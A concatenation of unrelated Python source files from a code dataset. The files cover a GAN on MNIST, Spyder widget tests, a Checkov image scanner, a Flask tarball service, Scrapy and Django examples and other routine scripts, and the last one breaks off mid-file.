0.001\n\nbatch_size = 100\n\nlabel_smothing = 0.9\n\n# 100 times to low - just here so I can test to make sure script still works\nepochs = 5\n\n# this is the list that will hold sample images when we run the session\nsamples = []\n\n\n############### Calling the functions (cleaned 
up) #############################\n\n# Feeding G the placeholder z which we'll pass in as noise with the feed_dict in sess\nG = generator(z)\n\n# Feed D real images (first) for training so D knows what the img's should look like\nD_output_real, D_logits_real = discriminator(real_images)\n\n# Feed discriminator generated fakes by by passing in the results from G(z)\n# *** NOTE: This is the first way the functions interact\nD_output_fake, D_logits_fake = discriminator(G, reuse=True)\n\n\n############### Using the trainable_variables from the Functions ###############\n\n# list of tf.Variable created via the layers api in the functions\ntvars = tf.trainable_variables()\n\n# List comprehension - works because tf.variable_scope in the G & D functions\n# Gonna use these with AdamOptimizer\nd_vars = [var for var in tvars if 'dis' in var.name]\ng_vars = [var for var in tvars if 'gen' in var.name]\n\n########################### Calculating loss ##################################\n\n# loss_func is essentially tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits)\n# *** NOTE: G_loss = loss_func(D_logits_fake) is the 2nd way D & G connect...\n\n# We want all of the real data labels to be true - hense the tf.ones as labels\n# Because = real_images But not exactly 1 as to not overfit - \"close to 1\" = smooting\nD_real_loss = loss_func(D_logits_real, tf.ones_like(D_logits_real) * label_smothing)\n\n# so, just the opposite - all the labels are zero cause they are all fakes\nD_fake_loss = loss_func(D_logits_fake, tf.zeros_like(D_logits_fake))\n\n# Final discriminator and generator loss\nD_loss = D_real_loss + D_fake_loss\n\n# Remember D_logits_fake is actually discriminator(G) so logits(G -> D) - labels = 1\n# the generator \"thinks\" its making true images so labels = 1\nG_loss = loss_func(D_logits_fake, tf.ones_like(D_logits_fake))\n\n\n######## Calling Adam Optimizer train the minimized loss on these lists of variables\n\n# Minimize the D_loss on the d_var list ( of discriminator variables)\nD_trainer = tf.train.AdamOptimizer(learning_rate).minimize(D_loss, var_list=d_vars)\nG_trainer = tf.train.AdamOptimizer(learning_rate).minimize(G_loss, var_list=g_vars)\n\n########################### The Session Then ###################################\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\n sess.run(init)\n\n for epoch in range(epochs):\n\n # how many batches does it take to go through all the training data\n num_batches = mnist.train.num_examples // batch_size\n\n for i in range(num_batches):\n\n batch = mnist.train.next_batch(batch_size)\n\n batch_images = batch[0].reshape((batch_size, 784))\n\n # rescale for the tanh activation function\n batch_images = batch_images * 2 - 1\n\n # again -1 to 1 because tanh - 100 is for the 100 random points\n batch_z = np.random.uniform(-1, 1, size=(batch_size, 100))\n\n # Run the optimizers - only care about the generators output tho\n # This is running the output of AdamOptimizer -> minimize the loss of the D variables\n _ = sess.run(D_trainer, feed_dict={real_images:batch_images, z:batch_z})\n _ = sess.run(G_trainer, feed_dict={z:batch_z})\n\n print(\"ON EPOCH {}\".format(epoch))\n\n # Sample from the Generator as we are training\n # Pass in some noise size in the shape of: 1 image, 100(batch size)\n sample_z = np.random.uniform(-1, 1, size=(1,100))\n\n # Generate a sample by runnning generator(z)\n gen_sample = sess.run(generator(z, reuse=True), feed_dict={z:sample_z})\n\n # Add each gen_sample ( which is an array still ) to the 
list!\n samples.append(gen_sample)\n\n# show me a sample image after we \"un-flatten it\"\n# samples[n].shape = the nth image in the sample list where < less epochs\nplt.imshow(samples[3].reshape(28,28))\n\n### Don't save! this is only running for a few epochs to test...\n\n''''\nsaver = tf.train.Saver(var_list = g_vars)\nnew_samples = []\n\nwith tf.Session() as sess:\n saver.restore(sess,'./models/500_epoch_model.ckpt')\n\n for x in range(5):\n sample_z = np.random.uniform(-1,1,size=(1,100))\n gen_sample = sess.run(generator(z,reuse=True),feed_dict={z:sample_z})\n\n new_samples.append(gen_sample)\n\nplt.imshow(new_samples[0].reshape(28,28))\n'''\n","sub_path":"mnist_gan.py","file_name":"mnist_gan.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"146093204","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © Spyder Project Contributors\n# Licensed under the terms of the MIT License\n#\n\n\"\"\"\nTests for findinfiles.py\n\"\"\"\n\n# Test library imports\nimport os\nimport pytest\nimport os.path as osp\nfrom pytestqt import qtbot\n\n# Local imports\nimport spyder.widgets.findinfiles\nfrom spyder.widgets.findinfiles import FindInFilesWidget\n\nLOCATION = os.path.realpath(os.path.join(os.getcwd(),\n os.path.dirname(__file__)))\n\n\ndef process_search_results(results):\n \"\"\"\n Transform result representation from the output of the widget to the\n test framework comparison representation.\n \"\"\"\n matches = {}\n for result in results.values():\n file, line, col = result\n filename = osp.basename(file)\n if filename not in matches:\n matches[filename] = []\n matches[filename].append((line, col))\n matches[filename] = sorted(matches[filename])\n return matches\n\n\n@pytest.fixture\ndef setup_findinfiles(qtbot, *args, **kwargs):\n \"\"\"Set up find in files widget.\"\"\"\n widget = FindInFilesWidget(None, *args, **kwargs)\n qtbot.addWidget(widget)\n return widget\n\n\ndef expected_results():\n results = {'spam.txt': [(1, 0), (1, 5), (3, 22)],\n 'spam.py': [(2, 7), (5, 1), (7, 12)],\n 'spam.cpp': [(2, 9), (6, 15), (8, 2), (11, 4),\n (11, 10), (13, 12)]\n }\n return results\n\n\ndef expected_case_unsensitive_results():\n results = {'spam.txt': [(1, 10)],\n 'ham.txt': [(1, 0), (1, 10), (3, 0), (4, 0),\n (5, 4), (9, 0), (10, 0)]}\n return results\n\n\ndef test_findinfiles(qtbot):\n \"\"\"Run find in files widget.\"\"\"\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.resize(640, 480)\n find_in_files.show()\n assert find_in_files\n\n\ndef test_find_in_files_search(qtbot):\n \"\"\"\n Test the find in files utility by searching a string located on a set of\n known files.\n\n The #1lab_results of the test should be equal to the expected search result\n values.\n \"\"\"\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.set_search_text(\"spam\")\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n assert expected_results() == matches\n\n\ndef test_exclude_extension(qtbot):\n find_in_files = setup_findinfiles(qtbot, exclude=\"\\.py$\")\n find_in_files.set_search_text(\"spam\")\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = 
process_search_results(find_in_files.result_browser.data)\n files_filtered = True\n for file in matches:\n filename, ext = osp.splitext(file)\n if ext == '.py':\n files_filtered = False\n break\n assert files_filtered\n\n\ndef test_case_unsensitive_search(qtbot):\n find_in_files = setup_findinfiles(qtbot, case_sensitive=False)\n find_in_files.set_search_text('ham')\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n print(matches)\n assert expected_case_unsensitive_results() == matches\n\n\ndef test_case_sensitive_search(qtbot):\n find_in_files = setup_findinfiles(qtbot)\n find_in_files.set_search_text('HaM')\n find_in_files.find_options.set_directory(osp.join(LOCATION, \"data\"))\n find_in_files.find()\n blocker = qtbot.waitSignal(find_in_files.sig_finished)\n blocker.wait()\n matches = process_search_results(find_in_files.result_browser.data)\n print(matches)\n assert matches == {'ham.txt': [(9, 0)]}\n\n\nif __name__ == \"__main__\":\n pytest.main()\n","sub_path":"lib/python2.7/site-packages/spyder/widgets/tests/test_findinfiles.py","file_name":"test_findinfiles.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59114084","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('testimg1.jpg')\n# cv2.imshow('bolt.jpg', img)\n# cv2.waitKey(0)\n\nwidth = img.shape[1]\nheight = img.shape[0]\n\nprint(\"width: %d\\nheight: %d\\n\"%(width, height))\n\n# while resizing an image we need tp keep aspect ratio of the image\n# aspect ratio is the relationship of the width and height of the image\n\n\"\"\"\n\twe define the new image width to be 500 pixels to compute new\n\theight we multiply the old height width aspect ratio r\n\tnew_height = old_height*r\n\"\"\"\nr = 500/img.shape[1]\ndim = (500, int(r*img.shape[0]))\n\nresimg = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\nprint(\"new widht: %d\\nnew_height: %d\\n\"%(resimg.shape[1], resimg.shape[0]))\ncv2.imwrite('resimg1.jpg', resimg)\ncv2.imshow('resizeimg.jpg', resimg)\ncv2.waitKey(0)\n\n\n# MAIN PROCESSING : HOG FEATURES RECOGNIZATION\n\nnew_img = cv2.imread('resimg1.jpg')\nnew_img = np.float32(new_img)/255.0\n\n# calculate gradient\n\ngx = cv2.Sobel(new_img, cv2.CV_32F,1,0, ksize=1)\ngy = cv2.Sobel(new_img, cv2.CV_32F,0,1, ksize=1)\n\n","sub_path":"hogfeature.py","file_name":"hogfeature.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"229156111","text":"#!/usr/bin/python\n# J2J - Jabber-To-Jabber component\n# http://JRuDevels.org\n# http://wiki.JRuDevels.org\n#\n# copyright 2007 Dobrov Sergey aka Binary from JRuDevels\n#\n# License: GPL-v3\n#\nimport getopt\nimport os\nimport sys\n\nfrom twisted.words.protocols.jabber import component\nfrom twisted.internet import reactor\nfrom twisted.scripts import _twistd_unix as twistd\n\nfrom ossignal import install_shutdown_handlers\nfrom config import Config\nimport j2j\n\ndef main():\n __all__ = ['j2j', 'client', 'database', 'roster',\n 'utils', 'adhoc', 'debug', 'config']\n revision = 0\n date = 0\n\n __id__ = \"$Id$\"\n\n try:\n modRev = int(__id__.split(\" \")[2])\n modDate = int(__id__.split(\" \")[3].replace(\"-\",\"\"))\n except:\n modRev = 0\n modDate = 0\n\n if modRev > revision:\n revision = modRev\n 
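    # (editor's note: hedged illustration, not in the original) these checks,
    # repeated inside the module loop below, just keep a running maximum over
    # the SVN-style "$Id$" revision/date fields; an equivalent sketch is:
    #   revision = max(revision, modRev)
    #   date = max(date, modDate)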
if modDate > date:\n date = modDate\n\n for modName in __all__:\n module = __import__(modName, globals(), locals())\n try:\n modRev = int(module.__id__.split(\" \")[2])\n modDate = int(module.__id__.split(\" \")[3].replace(\"-\",\"\"))\n except:\n modRev = 0\n modDate = 0\n if modRev > revision:\n revision = modRev\n if modDate > date:\n date = modDate\n\n if revision == 0:\n revision = ''\n else:\n revision = '.r' + str(revision)\n if date != 0:\n date = str(date)\n revision = revision+\" %s-%s-%s\" % (date[:4], date[4:6], date[6:8])\n\n version = \"1.2.10\" + revision\n\n from optparse import OptionParser\n parser = OptionParser(version=\n \"Jabber-To-Jabber component version:\" + version)\n parser.add_option('-c', '--config', metavar='FILE', dest='configFile',\n help=\"Read config from custom file\")\n parser.add_option('-b', '--background', dest='configBackground',\n help=\"Daemonize/background transport\",\n action=\"store_true\")\n (options,args) = parser.parse_args()\n configFile = options.configFile\n configBackground = options.configBackground\n\n if configFile:\n config = Config(configFile)\n else:\n config = Config()\n if configBackground and os.name == \"posix\": # daemons supported?\n twistd.daemonize() # send to background\n if config.PROCESS_PID:\n pid = str(os.getpid())\n pidfile = open(config.PROCESS_PID, \"w\")\n pidfile.write(\"%s\\n\" % pid)\n pidfile.close()\n\n c = j2j.J2JComponent(reactor, version, config, config.JID)\n f = component.componentFactory(config.JID,config.PASSWORD)\n connector = component.buildServiceManager(config.JID, config.PASSWORD,\n \"tcp:%s:%s\" % (config.HOST, config.PORT))\n c.setServiceParent(connector)\n connector.startService()\n install_shutdown_handlers(c.shuttingDown)\n reactor.run(installSignalHandlers=False)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"166026547","text":"# Create a SQLite3 database and table\n\nimport sqlite3\n\nwith sqlite3.connect(\"new.db\") as connection: # connects to existing database (\"new.db\")\n\tc = connection.cursor() # creates cursor object to execute SQL commands\n\n\tcities = [ # create python list of rows to be inserted\n\t\t\t('Boston', 'MA', 600000),\n\t\t\t('Los Angeles', 'CA', 38000000),\n\t\t\t('Houston', 'TX', 2100000),\n\t\t\t('Philadelphia', 'PA', 1500000),\n\t\t\t('San Antonio', 'TX', 1400000),\n\t\t\t('San Diego', 'CA', 130000),\n\t\t\t('Dallas', 'TX', 1200000),\n\t\t\t('San Jose', 'CA', 900000),\n\t\t\t('Jacksonville', 'FL', 800000),\n\t\t\t('Indianapolis', 'IN', 800000),\n\t\t\t('Austin', 'TX', 800000),\n\t\t\t('Detroit', 'MI', 700000)\n\t\t \t]\n\n\tc.execute(\"\"\"CREATE TABLE IF NOT EXISTS population (city TEXT, state TEXT, population INT)\"\"\")\n\tc.executemany('INSERT INTO population VALUES(?, ?, ?)', cities) # insert entire list\n\n#connection.close() # close database connection\n\n\n\n","sub_path":"sqlc.py","file_name":"sqlc.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"300654181","text":"import logging\nimport subprocess # nosec\nfrom typing import Union, Dict, Any\n\nimport docker\nimport json\nimport os\nimport time\n\nfrom checkov.common.bridgecrew.vulnerability_scanning.integrations.docker_image_scanning import docker_image_scanning_integration\n\nTWISTCLI_FILE_NAME = 
'twistcli'\nDOCKER_IMAGE_SCAN_RESULT_FILE_NAME = 'docker-image-scan-results.json'\n\n\ndef _get_docker_image_name(docker_image_id: str) -> str:\n try:\n docker_client = docker.from_env()\n return docker_client.images.get(docker_image_id).attrs['RepoDigests'][0].split('@')[0]\n except Exception as e:\n logging.error(\"docker image needs to have repository\")\n raise e\n\n\ndef _get_dockerfile_content(dockerfile_path: Union[str, \"os.PathLike[str]\"]) -> str:\n try:\n with open(dockerfile_path) as f:\n return f.read()\n except FileNotFoundError as e:\n logging.error(f\"Path to Dockerfile is invalid\\n{e}\")\n raise e\n except Exception as e:\n logging.error(f\"Failed to read Dockerfile content\\n{e}\")\n raise e\n\n\nclass ImageScanner:\n def __init__(self) -> None:\n self.docker_image_name = ''\n self.dockerfile_content = ''\n\n def setup_scan(\n self,\n docker_image_id: str,\n dockerfile_path: Union[str, \"os.PathLike[str]\"],\n skip_extract_image_name: bool,\n ) -> None:\n try:\n if skip_extract_image_name:\n # Provide a default image name in case the image has not been tagged with a name\n self.docker_image_name = f'repository/image{str(time.time() * 1000)}'\n else:\n self.docker_image_name = _get_docker_image_name(docker_image_id)\n self.dockerfile_content = _get_dockerfile_content(dockerfile_path)\n\n if not os.path.exists(TWISTCLI_FILE_NAME):\n docker_image_scanning_integration.download_twistcli(TWISTCLI_FILE_NAME)\n except Exception as e:\n logging.error(f\"Failed to setup docker image scanning\\n{e}\")\n raise e\n\n @staticmethod\n def cleanup_scan() -> None:\n os.remove(TWISTCLI_FILE_NAME)\n logging.info('twistcli file removed')\n\n @staticmethod\n def run_image_scan(docker_image_id: str) -> Dict[str, Any]:\n command = f\"./{TWISTCLI_FILE_NAME} images scan --address {docker_image_scanning_integration.get_proxy_address()} --token {docker_image_scanning_integration.get_bc_api_key()} --details --output-file \\\"{DOCKER_IMAGE_SCAN_RESULT_FILE_NAME}\\\" {docker_image_id}\"\n logging.debug(f\"TwistCLI: {command}\")\n subprocess.run(command, check=True, shell=True) # nosec\n logging.info(f'TwistCLI ran successfully on image {docker_image_id}')\n\n with open(DOCKER_IMAGE_SCAN_RESULT_FILE_NAME) as docker_image_scan_result_file:\n scan_result = json.load(docker_image_scan_result_file)\n return scan_result\n\n def scan(self, docker_image_id: str, dockerfile_path: str, skip_extract_image_name: bool = False) -> None:\n try:\n self.setup_scan(docker_image_id, dockerfile_path, skip_extract_image_name)\n scan_result = self.run_image_scan(docker_image_id)\n docker_image_scanning_integration.report_results(\n twistcli_scan_result=scan_result,\n file_path=dockerfile_path,\n file_content=self.dockerfile_content,\n docker_image_name=self.docker_image_name,\n )\n logging.info('Docker image scanning results reported to the platform')\n self.cleanup_scan()\n except Exception as e:\n logging.error(f\"Failed to scan docker image\\n{e}\")\n raise e\n\n\nimage_scanner = ImageScanner()\n","sub_path":"checkov/common/bridgecrew/vulnerability_scanning/image_scanner.py","file_name":"image_scanner.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"27504504","text":"from SyntheticDataset.image_operations import *\nfrom SyntheticDataset.color import *\nimport math\nimport multiprocessing\nimport timeit\nimport os\n\nDATA_PATH = \"/Users/vtolpegin/github/SUAS-Competition/SyntheticDataset/data\"\nSAVE_PATH = 
\"/Users/vtolpegin/github/SUAS-Competition/SyntheticDataset/Generated_Full_Targets\"\nTOTAL_GENERATED_TARGETS = 500\nNUM_PICS_PER_TARGET = 10\n\ndef run_image_generator(process_number, num_pics, starting_index):\n generator = ImageGenerator(DATA_PATH, process_number=process_number)\n\n # NOTE: Only leave one of the two sets of code uncommented\n # NOTE: Uncomment the following two lines to generate polygon pics\n generator.fillPolyPics(int(num_pics), starting_index)\n generator.savePolyPicImgs(SAVE_PATH)\n\n # NOTE: Uncomment the following two lines to generate full synthetic images\n #generator.generate_synthetic_images(int(num_pics), NUM_PICS_PER_TARGET, starting_index)\n #generator.save_synthetic_images(SAVE_PATH)\n\nif __name__ == '__main__':\n cpu_count = multiprocessing.cpu_count()\n # NOTE: Uncomment the following line to make the program run single threaded\n #cpu_count = 1\n pics_per_process = (TOTAL_GENERATED_TARGETS / cpu_count) + 1\n start_time = timeit.default_timer()\n\n jobs = []\n for index in range(cpu_count):\n starting_index = index * int(pics_per_process)\n image_generation_process = multiprocessing.Process(target=run_image_generator, args=(index, pics_per_process, starting_index))\n jobs.append(image_generation_process)\n image_generation_process.start()\n\n for job in jobs:\n job.join()\n\n print(\"====================================\")\n print(\"Total number of images generated:\", len(os.listdir(os.path.join(SAVE_PATH, \"Images\"))))\n print(\"Total elapsed time (sec):\", timeit.default_timer() - start_time)\n print(\"====================================\")\n","sub_path":"SyntheticDataset/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"615870208","text":"import os\nimport time\nimport datetime\nimport importlib.resources\n\ndef decorator(old_function):\n\n def new_function(*args, **kwargs):\n name_str = old_function.__name__\n ToDayTime = str(datetime.datetime.now())\n old_return = old_function(*args, **kwargs)\n text = os.path.abspath(__file__)\n\n data = \"Time run function: \"+ ToDayTime +'\\n'+\"Name of function: \" + name_str + '\\n' + \"RETURN of function: \" + str(old_return) +\\\n '\\n' + \"*args: \"+ str(args) + '\\n' + \"Path: \" + text\n with open('DataTime2', 'w') as f:\n f.write(data)\n return new_function","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"48722285","text":"# Simple, baseline model implementations for the WikiHop & MedHop datasets.\nimport random\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nimport fuzzy\n\nclass RandomModel(object):\n \"\"\"\n Model which randomly chooses a candidate from the list of potential candidates.\n \"\"\"\n def __init__(self):\n pass\n\n def predict(self, sample):\n return random.choice(sample.candidates)\n\n\nclass MajorityCandidatePerQueryTypeModel(object):\n \"\"\"\n Model which chooses the most common candidate for each query type/relationship.\n \"\"\"\n def __init__(self, query_candidate_frequencies):\n \"\"\"\n query_candidate_frequencies: A map of query type -> {entity -> counter}\n \"\"\"\n self.query_candidate_frequencies = query_candidate_frequencies\n\n def predict(self, sample):\n # Find the candidate with the highest frequency.\n # If we haven't seen this relationship before, just choose randomly.\n rel = 
sample.query.relationship\n if rel not in self.query_candidate_frequencies:\n return random.choice(sample.candidates)\n\n freqs = self.query_candidate_frequencies[rel]\n best_candidates, best_count = [], 0\n for candidate in sample.candidates:\n # Assume candidates we haven't seen before to have a frequency of 0.\n if freqs.get(candidate.text, 0) > best_count:\n best_candidates = [candidate]\n best_count = freqs.get(candidate.text, 0)\n elif best_count == freqs.get(candidate.text, 0):\n best_candidates.append(candidate)\n\n # Choose randomly with the candidates of the given frequency.\n return random.choice(best_candidates)\n\n\ndef train_majority_candidate_model(dataset):\n \"\"\"\n Train a majority candidate model by computing the per-relationship frequency scores for every candidate.\n \"\"\"\n # Not very complicated: just compute the frequency maps of candidates for each relationship type.\n query_cand_freqs = defaultdict(lambda: defaultdict(int))\n for sample in dataset:\n rel = sample.query.relationship\n query_cand_freqs[rel][sample.answer.text] += 1\n\n return MajorityCandidatePerQueryTypeModel(query_cand_freqs)\n\n\nclass MaxMentionModel(object):\n \"\"\"\n Model which returns the candidate which shows up in the support documents most frequently (after some normalization\n is applied).\n \"\"\"\n def __init__(self):\n pass\n\n def predict(self, sample):\n best_candidates, best_count = [], 0\n # Iterate through each candidate, counting how many times they occur in the support document\n # and taking the most common. If there are ties, break them randomly.\n for candidate in sample.candidates:\n count = 0\n for support in sample.supports:\n count += fuzzy.fuzzy_count(candidate.tokenized_text, support.tokenized_text)\n\n if count > best_count:\n best_candidates, best_count = [candidate], count\n elif count == best_count:\n best_candidates.append(candidate)\n\n return random.choice(best_candidates)\n\n\nclass DocumentCueModel(object):\n \"\"\"\n A model which computes cooccurence(d, c) for every candidate c; the co-occurence is the number of times\n that a given document appears in the support set of a sample where c is the answer. For inference,\n we simply take the candidate which has the highest co-occurence with any of the documents, i.e.,\n\n argmax over candidates c:\n max over supports d:\n cooccurence(c, d)\n \"\"\"\n def __init__(self, occurences):\n \"\"\"\n occurences: A map of (candidate, document) -> frequency count. The document and candidate should both be\n normalized strings.\n \"\"\"\n self.occurences = occurences\n\n def predict(self, sample):\n best_candidates, best_count = [], 0\n for candidate in sample.candidates:\n best_occurence = 0\n for document in sample.supports:\n norm_doc = document.text.lower()\n best_occurence = max(best_occurence, self.occurences.get((candidate.text, norm_doc), 0))\n\n if best_occurence > best_count:\n best_candidates, best_count = [candidate], best_occurence\n elif best_occurence == best_count:\n best_candidates.append(candidate)\n\n return random.choice(best_candidates)\n\n\ndef train_document_cue_model(dataset):\n \"\"\"\n Train a document que model (see DocumentCueModel).\n \"\"\"\n occurences = defaultdict(int)\n for sample in tqdm(dataset, desc=\"Doc. 
Cue Training\"):\n for support in sample.supports:\n norm_doc = support.text.lower()\n occurences[(sample.answer.text, norm_doc)] += 1\n\n return DocumentCueModel(occurences)\n","sub_path":"baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"405658218","text":"import numpy as np\nimport plotly\nimport plotly.graph_objs as go\nimport copy\n\n\n# return the layout to be used while plotting\ndef plot_layout():\n\n # mlen = max(robobj.initcoordmat[robobj.jointno-1])\n\n layout = go.Layout(\n scene=dict(\n xaxis=dict(range=[-6, 6],),\n yaxis=dict(range=[-6, 6],),\n zaxis=dict(range=[-6, 6],),),\n )\n return layout\n\n\ndef plot(data):\n plotly.offline.init_notebook_mode(connected=True)\n layout = plot_layout()\n fig = go.Figure(data=data, layout=layout)\n return fig\n\n\n# initialize the plot for robot arm and return a Robopos(data type)\ndef position(robobj, positionmatrix):\n\n i = 0\n initj = 0\n\n lenx = len(np.linspace(positionmatrix[i][0], positionmatrix[i+1][0]))\n x_array = np.zeros(lenx*3)\n y_array = np.zeros(lenx*3)\n z_array = np.zeros(lenx*3)\n\n while i < robobj.jointno:\n x = np.linspace(positionmatrix[i][0], positionmatrix[i+1][0])\n y = np.linspace(positionmatrix[i][1], positionmatrix[i+1][1])\n z = np.linspace(positionmatrix[i][2], positionmatrix[i+1][2])\n lenx = len(x)\n j = copy.deepcopy(initj)\n\n while j < lenx + initj:\n x_array[j] = x[j-initj]\n y_array[j] = y[j-initj]\n z_array[j] = z[j-initj]\n j = j + 1\n\n i = i + 1\n initj = copy.deepcopy(j)\n\n armvec = go.Scatter3d(\n x=x_array, y=y_array, z=z_array,\n marker=dict(\n size=2,\n ),\n line=dict(\n color='#1f77b4',\n width=1\n )\n )\n\n i = 0\n\n jointx = np.zeros(robobj.jointno + 1)\n jointy = np.zeros(robobj.jointno + 1)\n jointz = np.zeros(robobj.jointno + 1)\n\n while i < robobj.jointno + 1:\n jointx[i] = positionmatrix[i][0]\n jointy[i] = positionmatrix[i][1]\n jointz[i] = positionmatrix[i][2]\n i = i + 1\n\n joints = go.Scatter3d(\n x=jointx, y=jointy, z=jointz,\n marker=dict(\n size=5,\n ),\n line=dict(\n color='#ff7f0e',\n width=2\n )\n )\n data = [armvec, joints]\n\n return data\n\n\n# plot the current position of the robot\ndef current_position(robobj):\n data = position(robobj, robobj.coordmat)\n return data\n","sub_path":"kineticspy/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522728916","text":"#!/usr/bin/env python\n''' app.py - main application for the package-routine-web project\n\nRuns a Flask application that runs the tool to select routines\n\nExample:\n\n$ flask run\n$ flask run --help\n\n@author: Cade Brown \n'''\n\n# flask\nimport flask\nfrom flask import Flask, request, send_file, render_template\n\n# python stdlib\nimport time\nimport io\nimport os\nimport tarfile\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index_():\n return render_template('index.html')\n\n@app.route('/list')\ndef list_():\n # returns list of valid routines\n names = []\n for full in map(lambda x: x[:x.index('.')], filter(lambda x: '.tar' in x, os.listdir('tars/cuda'))):\n names.append(full.replace('magma_', ''))\n return ','.join(names)\n\n@app.route('/get')\ndef get_():\n curtime = time.time()\n interface = request.args.get('interface', 'cuda')\n\n routines = {*filter(lambda x: x, request.args.get('routines').split(','))}\n out_name = 
'magma_' + interface + '_' + '_'.join(routines) + '.tar.gz'\n\n # create in-memory buffer which is a tarfile\n out_buf = io.BytesIO()\n out_tar = tarfile.open(fileobj=out_buf, mode='w:gz')\n\n # manifest files which need to be merged instead of xor'd\n merged = {}\n\n merge_files = {key: set() for key in [\n 'FUNCS.mf',\n 'WARNINGS.mf',\n 'BLAS.mf',\n ]}\n \n # wraps as 'addfile' acceptable parameters to `tarfile.addfile`\n def wrap(fname, src):\n oi = tarfile.TarInfo(fname)\n # fill in meta data (size is required; else everything is empty!)\n oi.size = len(src)\n oi.mtime = curtime\n\n # we need to return a TarInfo and a readable IO-like object (as if a file was opened)\n return oi, io.BytesIO(src)\n\n # go through tar files for each routines\n for r in routines:\n tf = tarfile.open('tars/' + interface + '/magma_' + r + '.tar.gz')\n for fl in tf:\n # extract and read as bytes\n ef = tf.extractfile(fl)\n src = ef.read()\n if fl.name.endswith('.mf'):\n # just combine unique lines\n merged[fl.name] = merged.get(fl.name, set()) | {*src.split(b'\\n')}\n elif fl.name not in out_tar:\n # add source\n out_tar.addfile(*wrap(fl.name, src))\n\n # add merged files in as well\n for fl in merged:\n if fl not in out_tar:\n out_tar.addfile(*wrap(fl, b'\\n'.join(merged[fl])))\n\n # finish the tar file\n out_tar.close()\n\n # now, reset position so that the 'send_file' function reads it like an open file\n out_buf.seek(0)\n return send_file(out_buf, mimetype='tar', as_attachment=True, attachment_filename=out_name)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"tools/package-routine-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"290749624","text":"from scrapy.selector import Selector\nfrom scrapy.http import HtmlResponse\n\n\nbody = '''\n\n \n
<html>\n<body>\n  <div><b>Hello world 0</b></div>\n  <div><b>Hello world 1</b></div>\n  Hello world 2\n\n  <ul>\n    <li><b>Python 价格:99.0 元</b></li>\n    <li><b>R 价格:199.0 元</b></li>\n    <li><b>Swift 价格:299 元</b></li>\n    <li><b>Swift 价格:399 元</b></li>\n  </ul>\n</body>\n</html>
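<!-- the xpath './/li/b/text()' and the regexes below extract the numeric prices from these li/b entries -->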
\n \n\n\n'''\n\nresponse = HtmlResponse(url='htttp://www.example.com',\n body=body, encoding='utf-8')\nselector = Selector(response=response)\n\nli_selctors = selector.xpath('.//li/b/text()')\nprint(li_selctors)\n\n# 只提取价格的float 数字部分\nprices = selector.xpath('.//li/b/text()').re('\\d+\\.\\d+')\nprint(prices)\n# 提取出float和int\nprices = selector.xpath('.//li/b/text()').re('\\d*\\.?\\d+')\nprint(prices)\n\nfirst = selector.xpath('.//li/b/text()').re_first('\\d+\\.\\d+')\nprint('first=', first)\n\n","sub_path":"i00mastering_scrapy/ch3selector_extract_data/i2regex.py","file_name":"i2regex.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"357902889","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\nfrom .models import Board\n\n\n\n# Create your views here.\ndef index(request):\n # Board 의 전체 데이터를 불러온다 - QuerySet\n boards = Board.objects.all()\n context = {'boards': boards}\n return render(request, 'boards/index.html', context)\n\n\n# 사용자 입력을 받는 페이지 렌터링\n@require_http_methods(['GET', 'POST'])\ndef new(request):\n # GET\n if request.method == 'GET':\n return render(request, 'boards/new.html')\n # POST\n else:\n title = request.POST.get('title')\n content = request.POST.get('content')\n board = Board(title=title, content=content)\n board.save()\n print('new board id: ', board.id)\n return redirect('boards:detail', board.id)\n\n\n# 특정 게시글 하나만 